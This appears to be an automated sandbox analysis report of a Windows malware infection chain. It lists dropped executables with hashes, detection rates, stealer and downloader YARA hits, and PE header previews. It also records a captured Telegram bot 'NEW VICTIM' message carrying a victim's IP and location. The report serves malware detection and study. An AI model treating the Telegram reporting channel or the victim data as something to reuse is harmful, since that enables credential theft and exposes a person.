                                                                                                                                                                                                      Preview:{"ok":true,"result":{"message_id":11788,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734218498,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 89.187.171.165\nDevice Name: 704672\nLocation: Atlanta, Georgia, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":14,"type":"url"},{"offset":63,"length":12,"type":"bold"},{"offset":83,"length":9,"type":"bold"},{"offset":114,"length":8,"type":"bold"},{"offset":123,"length":13,"type":"code"}]}}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):73505272
                                                                                                                                                                                                      Entropy (8bit):2.3539418785840476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:393216:ErQSatY8L2Vmd6melh2pdc/e+7G99YDv/JEv7uXevTp+:EUSai8yVmdKQpdu7na60+
                                                                                                                                                                                                      MD5:EC1C0306004DB340A454EEAC2ABEDA4A
                                                                                                                                                                                                      SHA1:10955ABECD785DF1844BA47B76DC9359097D0D1D
                                                                                                                                                                                                      SHA-256:EB1CE44571BFF61FFB2BE7994C6A7D00AFEBFDFF969B99168FBE787F2AA7E79F
                                                                                                                                                                                                      SHA-512:7E31D6422A163372FFB6570D79528CCF240BF4A02BF3A6F026629E2852D0EAC884D81CC9C4E9864E74ED184DE96C1C6F639A952086EFF6CA4A5D5D2E439ED86E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....\g.........."......6...v................@..........................................`..................................................[..x........&......................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc....&.......(..................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                      Entropy (8bit):4.9485431528176616
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:5LKS39zKE0g6cJv1Vpv//fTdD3Dd5LJW1CRW35jY:934g6cJv1j/Xn3WV5k
                                                                                                                                                                                                      MD5:6F52D4DB1877B789A41E3D246FE72071
                                                                                                                                                                                                      SHA1:48ABD4ED82586E3872427C3D56926D944C2863B3
                                                                                                                                                                                                      SHA-256:BB0E62DF940826B0F7D7DF84E86192B1ABCF027153A2F65D9BF2E14419198F3A
                                                                                                                                                                                                      SHA-512:7AABB236FFB855699AE947681CFADA064AD3DA7CECDD78B8928E0DC5AB000D166327842B4598968317AFC614B0F6396F33ED80DD4B85D8345E544A7A0C858476
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:{. "ip": "89.187.171.165",. "hostname": "unn-89-187-171-165.cdn77.com",. "city": "Atlanta",. "region": "Georgia",. "country": "US",. "loc": "33.7490,-84.3880",. "org": "AS60068 Datacamp Limited",. "postal": "30302",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2955776
                                                                                                                                                                                                      Entropy (8bit):6.5285945216773476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:VBBzkS0JMT/WoHTsNURLwsT1A5My3+AJsQZ:7uS0KT/tQNuLXJ8XJPZ
                                                                                                                                                                                                      MD5:4765874B881A2BCE3AAEFB16805EF1A5
                                                                                                                                                                                                      SHA1:C636EEE519C221952660BCCFC070C5E11F80544E
                                                                                                                                                                                                      SHA-256:53F7712B930FB66E762DCD1618DB577BE1B983B28CE66EF978FD6764B7D8A25D
                                                                                                                                                                                                      SHA-512:0363ADCDF7C536679C51A6C221560EC17EDA703EBE05DC006E34994077C21C26E450DC740BB3E8F6210E1973DED06643DEDFE7DD8E0DDBFBF80A06CBF24465D8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................0...........@...........................0.......-...@.................................W...k.......D.....................0.............................P.0..................................................... . ............................@....rsrc...D...........................@....idata ............................@...ldrpiuby..*.......*.................@...cguvigub......0.......,.............@....taggant.0....0.."....,.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2746368
                                                                                                                                                                                                      Entropy (8bit):6.508266247700136
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:n/DlAs8RnkkhIKuW+Bmv1+24dDU/t9C7JOy:/DlN8l5hIKur41SdGKx
                                                                                                                                                                                                      MD5:3433CA8689FA0A7F4B59713960FBDAAC
                                                                                                                                                                                                      SHA1:82BCBE51B06193064E1358C5F3E5124F3A6BC981
                                                                                                                                                                                                      SHA-256:8473C05546ACF67E533875D0DC2CB59015BFE54E3354D7081F859F43638783C4
                                                                                                                                                                                                      SHA-512:5D2BE96AF24B03BEFD5F6B096D6A382F006280E86625C09E90BB3039DDFB07B77D38C85A9A76F468CF17DB7B449A183D1B7C1548193F18DF2DBB2A26A2867C17
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`*.. ...`....@.. ........................*.....!5*...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...eacxpgzo..).......)..:..............@...bagugiyz. ...@*.......).............@....taggant.@...`*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4438776
                                                                                                                                                                                                      Entropy (8bit):7.99505709582503
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                      MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                      SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                      SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                      SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2955776
                                                                                                                                                                                                      Entropy (8bit):6.5285945216773476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:VBBzkS0JMT/WoHTsNURLwsT1A5My3+AJsQZ:7uS0KT/tQNuLXJ8XJPZ
                                                                                                                                                                                                      MD5:4765874B881A2BCE3AAEFB16805EF1A5
                                                                                                                                                                                                      SHA1:C636EEE519C221952660BCCFC070C5E11F80544E
                                                                                                                                                                                                      SHA-256:53F7712B930FB66E762DCD1618DB577BE1B983B28CE66EF978FD6764B7D8A25D
                                                                                                                                                                                                      SHA-512:0363ADCDF7C536679C51A6C221560EC17EDA703EBE05DC006E34994077C21C26E450DC740BB3E8F6210E1973DED06643DEDFE7DD8E0DDBFBF80A06CBF24465D8
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................0...........@...........................0.......-...@.................................W...k.......D.....................0.............................P.0..................................................... . ............................@....rsrc...D...........................@....idata ............................@...ldrpiuby..*.......*.................@...cguvigub......0.......,.............@....taggant.0....0.."....,.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4438776
                                                                                                                                                                                                      Entropy (8bit):7.99505709582503
                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                      SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                      MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                      SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                      SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                      SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):727552
                                                                                                                                                                                                      Entropy (8bit):7.888061454157426
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
                                                                                                                                                                                                      MD5:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                      SHA1:39890A418FB391B823ED5084533E2E24DFF021E1
                                                                                                                                                                                                      SHA-256:9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
                                                                                                                                                                                                      SHA-512:85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):605696
                                                                                                                                                                                                      Entropy (8bit):6.377818589865092
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                      MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                      SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                      SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):73505272
                                                                                                                                                                                                      Entropy (8bit):2.3539418785840476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:393216:ErQSatY8L2Vmd6melh2pdc/e+7G99YDv/JEv7uXevTp+:EUSai8yVmdKQpdu7na60+
                                                                                                                                                                                                      MD5:EC1C0306004DB340A454EEAC2ABEDA4A
                                                                                                                                                                                                      SHA1:10955ABECD785DF1844BA47B76DC9359097D0D1D
                                                                                                                                                                                                      SHA-256:EB1CE44571BFF61FFB2BE7994C6A7D00AFEBFDFF969B99168FBE787F2AA7E79F
                                                                                                                                                                                                      SHA-512:7E31D6422A163372FFB6570D79528CCF240BF4A02BF3A6F026629E2852D0EAC884D81CC9C4E9864E74ED184DE96C1C6F639A952086EFF6CA4A5D5D2E439ED86E
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d.....\g.........."......6...v................@..........................................`..................................................[..x........&......................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc....&.......(..................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):321024
                                                                                                                                                                                                      Entropy (8bit):6.388427618173688
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:u2ShpWIPJq+l0qwJyLZhOaHgEbR23iLEhO5efjlbDdl75Zsa1bkZ:uxVl0qwIhOAgEbXUjLF
                                                                                                                                                                                                      MD5:876A365BDA09B9EF39605E375D677F0A
                                                                                                                                                                                                      SHA1:2C12B38ED2D84722CF5DCEA8BD45CFA7D7B55BA4
                                                                                                                                                                                                      SHA-256:ED252FE89BA1243BAD21F373C952B16940A0094149B0BE50E5C3DA9C20A23234
                                                                                                                                                                                                      SHA-512:2A2DF513D61E9B0EEEDF099BB6A04962CAA5EB31149EFC24421BC30236886FC4A60FB7BCABED46069F0A13789CA34D4F21BC02F3C53BD8CF428BE399AE63CB7D
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....e.................X....?.....\........p....@..........................pB.............................................l...P....pA.0..............................................................@............p...............................text....V.......X.................. ..`.rdata..L"...p...$...\..............@..@.data.....=......p..................@....rsrc...0....pA.....................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2171872
                                                                                                                                                                                                      Entropy (8bit):7.7099497618349515
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:49152:RwQjzMOpKBpxGlMEFxZ6Ox4zIoCtNx6wz:7zM5EGEFxZwI5fJz
                                                                                                                                                                                                      MD5:E48D0435A98834793CE9DE1BB80FCF9A
                                                                                                                                                                                                      SHA1:F783AD89853913987852C17E950F9697AFBC4EDE
                                                                                                                                                                                                      SHA-256:BB6973B370222C70D95255622B354A328809A1116D31C69122B35508E1601831
                                                                                                                                                                                                      SHA-512:7E3018A7F2741CF8ADC3491EEA00A2C67B25831F51904A956DC63FC8EAC2BAC876D4015F5AA0AB554BF45C5A2F93ADCA0D0810AAD758E61D072C3E0B038553A2
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h&T...............P.................. ... ....@.. .......................`!.....V<!...@.................................P...K.... ..P............. ..'...@!...................................................... ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@!....... .............@..B........................H........{..t...........d...............................................6+.(..GX(....*......*....(....*.....*.......*.......*....(....*..0..........(....84.......E....2...R...8-...s.........8....s.........80...s.........8....s......... .....:....& ....8....*s......... .....9....&8........0.............*.0.............*.0.............*.0.............*.0.............*....*.......*....0.............*.0.............*....*....0.............*"...*...*.......*.......*.......*.......
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):309760
                                                                                                                                                                                                      Entropy (8bit):6.300290167119982
                                                                                                                                                                                                      Encrypted:false
